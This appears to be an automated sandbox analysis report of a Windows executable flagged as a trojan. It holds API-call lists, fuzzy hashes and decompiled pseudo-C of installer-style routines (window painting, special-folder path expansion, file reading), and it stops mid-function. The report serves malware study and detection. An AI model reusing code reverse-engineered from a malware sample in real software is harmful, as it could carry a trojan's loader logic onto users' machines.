                                                                                    0x00406405
                                                                                    0x00406410
                                                                                    0x00406416
                                                                                    0x00000000
                                                                                    0x00406416
                                                                                    0x004063ce
                                                                                    0x004063d1
                                                                                    0x004063dc
                                                                                    0x004063d8
                                                                                    0x004063da
                                                                                    0x004063db
                                                                                    0x004063db
                                                                                    0x004063e3
                                                                                    0x004063e5
                                                                                    0x00000000
                                                                                    0x004063e5
                                                                                    0x004063af
                                                                                    0x004063b5
                                                                                    0x00000000
                                                                                    0x004063b5
                                                                                    0x00406381
                                                                                    0x0040635f
                                                                                    0x004062de
                                                                                    0x004062e9
                                                                                    0x004062f2
                                                                                    0x004062f6
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004062f6
                                                                                    0x00406427

                                                                                    APIs
                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406449,?,?), ref: 004062E9
                                                                                    • GetShortPathNameW.KERNEL32(?,00426DE8,00000400), ref: 004062F2
                                                                                      • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                                                                                      • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                                                                                    • GetShortPathNameW.KERNEL32(?,004275E8,00000400), ref: 0040630F
                                                                                    • wsprintfA.USER32 ref: 0040632D
                                                                                    • GetFileSize.KERNEL32(00000000,00000000,004275E8,C0000000,00000004,004275E8,?,?,?,?,?), ref: 00406368
                                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406377
                                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063AF
                                                                                    • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004269E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 00406405
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00406416
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040641D
                                                                                      • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe,80000000,00000003), ref: 0040615C
                                                                                      • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                    • String ID: %ls=%ls$[Rename]$mB$uB$uB
                                                                                    • API String ID: 2171350718-2295842750
                                                                                    • Opcode ID: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
                                                                                    • Instruction ID: df9b4e9fb9d32bd4c250032a1d399944af7a2e4c2f0bdec2b7d3959d12e60cc8
                                                                                    • Opcode Fuzzy Hash: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
                                                                                    • Instruction Fuzzy Hash: B8314331200315BBD2206B619D49F5B3AACEF85704F16003BFD02FA2C2EA7DD82186BD
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 90%
                                                                                    			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42a270;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x429260, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42a268;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}













                                                                                    0x0040100a
                                                                                    0x00401039
                                                                                    0x00401047
                                                                                    0x0040104d
                                                                                    0x00401051
                                                                                    0x0040105b
                                                                                    0x00401061
                                                                                    0x00401064
                                                                                    0x004010f3
                                                                                    0x00401089
                                                                                    0x0040108c
                                                                                    0x004010a6
                                                                                    0x004010bd
                                                                                    0x004010cc
                                                                                    0x004010cf
                                                                                    0x004010d5
                                                                                    0x004010d9
                                                                                    0x004010e4
                                                                                    0x004010ed
                                                                                    0x004010ef
                                                                                    0x004010ef
                                                                                    0x00401100
                                                                                    0x00401105
                                                                                    0x0040110d
                                                                                    0x00401110
                                                                                    0x00401112
                                                                                    0x00401118
                                                                                    0x0040111f
                                                                                    0x00401126
                                                                                    0x00401130
                                                                                    0x00401142
                                                                                    0x00401156
                                                                                    0x00401160
                                                                                    0x00401165
                                                                                    0x00401165
                                                                                    0x00401110
                                                                                    0x0040116e
                                                                                    0x00000000
                                                                                    0x00401178
                                                                                    0x00401010
                                                                                    0x00401013
                                                                                    0x00401015
                                                                                    0x0040101f
                                                                                    0x0040101f
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                                    • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                    • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                    • DeleteObject.GDI32(?), ref: 004010ED
                                                                                    • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                    • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                    • DrawTextW.USER32(00000000,00429260,000000FF,00000010,00000820), ref: 00401156
                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                    • DeleteObject.GDI32(?), ref: 00401165
                                                                                    • EndPaint.USER32(?,?), ref: 0040116E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                    • String ID: F
                                                                                    • API String ID: 941294808-1304234792
                                                                                    • Opcode ID: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                                                                                    • Instruction ID: e2f9fea5dfd6f059ba8eeb08e8d10ac227d01a2162b8a260283931f50cd0bfbf
                                                                                    • Opcode Fuzzy Hash: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                                                                                    • Instruction Fuzzy Hash: 33418B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0C7349A55DFA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004066A5 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 196stringCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 72%
                                                                                    			E004066A5(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
				struct _ITEMIDLIST* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t44;
				WCHAR* _t45;
				signed char _t47;
				signed int _t48;
				short _t59;
				short _t61;
				short _t63;
				void* _t71;
				signed int _t77;
				signed int _t78;
				short _t81;
				short _t82;
				signed char _t84;
				signed int _t85;
				void* _t98;
				void* _t104;
				intOrPtr* _t105;
				void* _t107;
				WCHAR* _t108;
				void* _t110;

				_t107 = __esi;
				_t104 = __edi;
				_t71 = __ebx;
				_t44 = _a8;
				if(_t44 < 0) {
					_t44 =  *( *0x42923c - 4 + _t44 * 4);
				}
				_push(_t71);
				_push(_t107);
				_push(_t104);
				_t105 =  *0x42a298 + _t44 * 2;
				_t45 = 0x428200;
				_t108 = 0x428200;
				if(_a4 >= 0x428200 && _a4 - 0x428200 >> 1 < 0x800) {
					_t108 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				_t81 =  *_t105;
				_a8 = _t81;
				if(_t81 == 0) {
					L43:
					 *_t108 =  *_t108 & 0x00000000;
					if(_a4 == 0) {
						return _t45;
					}
					return E00406668(_a4, _t45);
				} else {
					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
						_t98 = 2;
						_t105 = _t105 + _t98;
						if(_t81 >= 4) {
							if(__eflags != 0) {
								 *_t108 = _t81;
								_t108 = _t108 + _t98;
								__eflags = _t108;
							} else {
								 *_t108 =  *_t105;
								_t108 = _t108 + _t98;
								_t105 = _t105 + _t98;
							}
							L42:
							_t82 =  *_t105;
							_a8 = _t82;
							if(_t82 != 0) {
								_t81 = _a8;
								continue;
							}
							goto L43;
						}
						_t84 =  *((intOrPtr*)(_t105 + 1));
						_t47 =  *_t105;
						_t48 = _t47 & 0x000000ff;
						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
						_t85 = _t84 & 0x000000ff;
						_v28 = _t48 | 0x00008000;
						_t77 = 2;
						_v16 = _t85;
						_t105 = _t105 + _t77;
						_v24 = _t48;
						_v20 = _t85 | 0x00008000;
						if(_a8 != _t77) {
							__eflags = _a8 - 3;
							if(_a8 != 3) {
								__eflags = _a8 - 1;
								if(__eflags == 0) {
									__eflags = (_t48 | 0xffffffff) - _v12;
									E004066A5(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
								}
								L38:
								_t108 =  &(_t108[lstrlenW(_t108)]);
								_t45 = 0x428200;
								goto L42;
							}
							_t78 = _v12;
							__eflags = _t78 - 0x1d;
							if(_t78 != 0x1d) {
								__eflags = (_t78 << 0xb) + 0x42b000;
								E00406668(_t108, (_t78 << 0xb) + 0x42b000);
							} else {
								E004065AF(_t108,  *0x42a268);
							}
							__eflags = _t78 + 0xffffffeb - 7;
							if(__eflags < 0) {
								L29:
								E004068EF(_t108);
							}
							goto L38;
						}
						if( *0x42a2e4 != 0) {
							_t77 = 4;
						}
						_t121 = _t48;
						if(_t48 >= 0) {
							__eflags = _t48 - 0x25;
							if(_t48 != 0x25) {
								__eflags = _t48 - 0x24;
								if(_t48 == 0x24) {
									GetWindowsDirectoryW(_t108, 0x400);
									_t77 = 0;
								}
								while(1) {
									__eflags = _t77;
									if(_t77 == 0) {
										goto L26;
									}
									_t59 =  *0x42a264;
									_t77 = _t77 - 1;
									__eflags = _t59;
									if(_t59 == 0) {
										L22:
										_t61 = SHGetSpecialFolderLocation( *0x42a268,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
										__eflags = _t61;
										if(_t61 != 0) {
											L24:
											 *_t108 =  *_t108 & 0x00000000;
											__eflags =  *_t108;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v8, _t108);
										_a8 = _t61;
										__imp__CoTaskMemFree(_v8);
										__eflags = _a8;
										if(_a8 != 0) {
											goto L26;
										}
										goto L24;
									}
									_t63 =  *_t59( *0x42a268,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
									__eflags = _t63;
									if(_t63 == 0) {
										goto L26;
									}
									goto L22;
								}
								goto L26;
							}
							GetSystemDirectoryW(_t108, 0x400);
							goto L26;
						} else {
							E00406536( *0x42a298, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x42a298 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
							if( *_t108 != 0) {
								L27:
								if(_v16 == 0x1a) {
									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L29;
							}
							E004066A5(_t77, _t105, _t108, _t108, _v16);
							L26:
							if( *_t108 == 0) {
								goto L29;
							}
							goto L27;
						}
					}
					goto L43;
				}
			}





























                                                                                    0x004066a5
                                                                                    0x004066a5
                                                                                    0x004066a5
                                                                                    0x004066ab
                                                                                    0x004066b0
                                                                                    0x004066c1
                                                                                    0x004066c1
                                                                                    0x004066c9
                                                                                    0x004066ca
                                                                                    0x004066cb
                                                                                    0x004066cc
                                                                                    0x004066cf
                                                                                    0x004066d7
                                                                                    0x004066d9
                                                                                    0x004066ea
                                                                                    0x004066ed
                                                                                    0x004066ed
                                                                                    0x004066f1
                                                                                    0x004066f7
                                                                                    0x004066fa
                                                                                    0x004068d5
                                                                                    0x004068d5
                                                                                    0x004068e0
                                                                                    0x004068ec
                                                                                    0x004068ec
                                                                                    0x00000000
                                                                                    0x00406700
                                                                                    0x00406705
                                                                                    0x0040671a
                                                                                    0x0040671b
                                                                                    0x00406721
                                                                                    0x004068b3
                                                                                    0x004068c1
                                                                                    0x004068c4
                                                                                    0x004068c4
                                                                                    0x004068b5
                                                                                    0x004068b8
                                                                                    0x004068bb
                                                                                    0x004068bd
                                                                                    0x004068bd
                                                                                    0x004068c6
                                                                                    0x004068c6
                                                                                    0x004068cc
                                                                                    0x004068cf
                                                                                    0x00406702
                                                                                    0x00000000
                                                                                    0x00406702
                                                                                    0x00000000
                                                                                    0x004068cf
                                                                                    0x00406727
                                                                                    0x0040672a
                                                                                    0x00406739
                                                                                    0x00406740
                                                                                    0x0040674c
                                                                                    0x0040674f
                                                                                    0x00406752
                                                                                    0x00406753
                                                                                    0x00406758
                                                                                    0x0040675e
                                                                                    0x00406761
                                                                                    0x00406764
                                                                                    0x00406857
                                                                                    0x0040685c
                                                                                    0x0040688f
                                                                                    0x00406894
                                                                                    0x00406899
                                                                                    0x0040689e
                                                                                    0x0040689e
                                                                                    0x004068a3
                                                                                    0x004068a9
                                                                                    0x004068ac
                                                                                    0x00000000
                                                                                    0x004068ac
                                                                                    0x0040685e
                                                                                    0x00406861
                                                                                    0x00406864
                                                                                    0x00406879
                                                                                    0x00406880
                                                                                    0x00406866
                                                                                    0x0040686d
                                                                                    0x0040686d
                                                                                    0x00406888
                                                                                    0x0040688b
                                                                                    0x0040684f
                                                                                    0x00406850
                                                                                    0x00406850
                                                                                    0x00000000
                                                                                    0x0040688b
                                                                                    0x00406771
                                                                                    0x00406775
                                                                                    0x00406775
                                                                                    0x00406776
                                                                                    0x00406778
                                                                                    0x004067b5
                                                                                    0x004067b8
                                                                                    0x004067c8
                                                                                    0x004067cb
                                                                                    0x004067d3
                                                                                    0x004067d9
                                                                                    0x004067d9
                                                                                    0x00406834
                                                                                    0x00406834
                                                                                    0x00406836
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004067dd
                                                                                    0x004067e2
                                                                                    0x004067e3
                                                                                    0x004067e5
                                                                                    0x004067fc
                                                                                    0x0040680a
                                                                                    0x00406810
                                                                                    0x00406812
                                                                                    0x00406830
                                                                                    0x00406830
                                                                                    0x00406830
                                                                                    0x00000000
                                                                                    0x00406830
                                                                                    0x00406818
                                                                                    0x00406821
                                                                                    0x00406824
                                                                                    0x0040682a
                                                                                    0x0040682e
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040682e
                                                                                    0x004067f6
                                                                                    0x004067f8
                                                                                    0x004067fa
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004067fa
                                                                                    0x00000000
                                                                                    0x00406834
                                                                                    0x004067c0
                                                                                    0x00000000
                                                                                    0x0040677a
                                                                                    0x00406798
                                                                                    0x004067a1
                                                                                    0x0040683e
                                                                                    0x00406842
                                                                                    0x0040684a
                                                                                    0x0040684a
                                                                                    0x00000000
                                                                                    0x00406842
                                                                                    0x004067ab
                                                                                    0x00406838
                                                                                    0x0040683c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040683c
                                                                                    0x00406778
                                                                                    0x00000000
                                                                                    0x00406705

                                                                                    APIs
                                                                                    • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004067C0
                                                                                    • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,00422728,?,00405701,00422728,00000000,00000000,00000000,00000000), ref: 004067D3
                                                                                    • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                                                    • lstrlenW.KERNEL32(Call,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: Directory$SystemWindowslstrcatlstrlen
                                                                                    • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                    • API String ID: 4260037668-1230650788
                                                                                    • Opcode ID: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
                                                                                    • Instruction ID: 414c90a3e727c3679fd522760d05a71ccfd37451a898d0680c6fb4b4ce958948
                                                                                    • Opcode Fuzzy Hash: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
                                                                                    • Instruction Fuzzy Hash: CD61E172A02115EBDB20AF64CD40BAA37A5EF10314F22C13EE946B62D0DB3D49A1CB5D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0040462B Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E0040462B(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}









                                                                                    0x0040463d
                                                                                    0x004046f3
                                                                                    0x00000000
                                                                                    0x004046f3
                                                                                    0x0040464e
                                                                                    0x00404652
                                                                                    0x00000000
                                                                                    0x0040466c
                                                                                    0x0040466c
                                                                                    0x00404675
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00404677
                                                                                    0x00404683
                                                                                    0x00404686
                                                                                    0x00404686
                                                                                    0x0040468c
                                                                                    0x00404692
                                                                                    0x00404692
                                                                                    0x0040469e
                                                                                    0x004046a4
                                                                                    0x004046ab
                                                                                    0x004046ae
                                                                                    0x004046b1
                                                                                    0x004046b3
                                                                                    0x004046b3
                                                                                    0x004046bb
                                                                                    0x004046c1
                                                                                    0x004046c1
                                                                                    0x004046cb
                                                                                    0x004046d0
                                                                                    0x004046d3
                                                                                    0x004046d8
                                                                                    0x004046db
                                                                                    0x004046db
                                                                                    0x004046eb
                                                                                    0x004046eb
                                                                                    0x00000000
                                                                                    0x004046ee

                                                                                    APIs
                                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 00404648
                                                                                    • GetSysColor.USER32(00000000), ref: 00404686
                                                                                    • SetTextColor.GDI32(?,00000000), ref: 00404692
                                                                                    • SetBkMode.GDI32(?,?), ref: 0040469E
                                                                                    • GetSysColor.USER32(?), ref: 004046B1
                                                                                    • SetBkColor.GDI32(?,?), ref: 004046C1
                                                                                    • DeleteObject.GDI32(?), ref: 004046DB
                                                                                    • CreateBrushIndirect.GDI32(?), ref: 004046E5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2320649405-0
                                                                                    • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                                    • Instruction ID: e78b8cc9c8042372c9a7340b9b8aa9b23ded286a9f8ddc7240a2e2d8bd1f46c0
                                                                                    • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                                    • Instruction Fuzzy Hash: DE2197715007049FC7309F28D908B5BBBF8AF42714F008D2EE992A22E1D739D944DB58
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 87%
                                                                                    			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
				_t66 = E00402D84(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x42a2e8 =  *0x42a2e8 +  *(_t76 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x44) = 0x3ff;
					}
					if( *__edi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *(_t76 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x38) = __ebx;
						 *(__ebp - 0x18) = E004065C8(__ecx, __edi);
						if( *(__ebp - 0x44) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E00406239( *(__ebp - 0x18), __ebx) >= 0) {
										__eax = __ebp - 0x50;
										if(E004061DB( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x40;
									_push(__ebx);
									_push(__ebp - 0x40);
									__eax = 2;
									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x40);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x4c) = __ecx;
											 *(__ebp - 0x50) = __eax;
											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E004065AF( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x50 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x50);
												} else {
													__edi =  *(__ebp - 0x4c);
													__edi =  ~( *(__ebp - 0x4c));
													while(1) {
														_t22 = __ebp - 0x40;
														 *_t22 =  *(__ebp - 0x40) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x50) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
														__edi = __edi + 1;
														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
														__eax = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
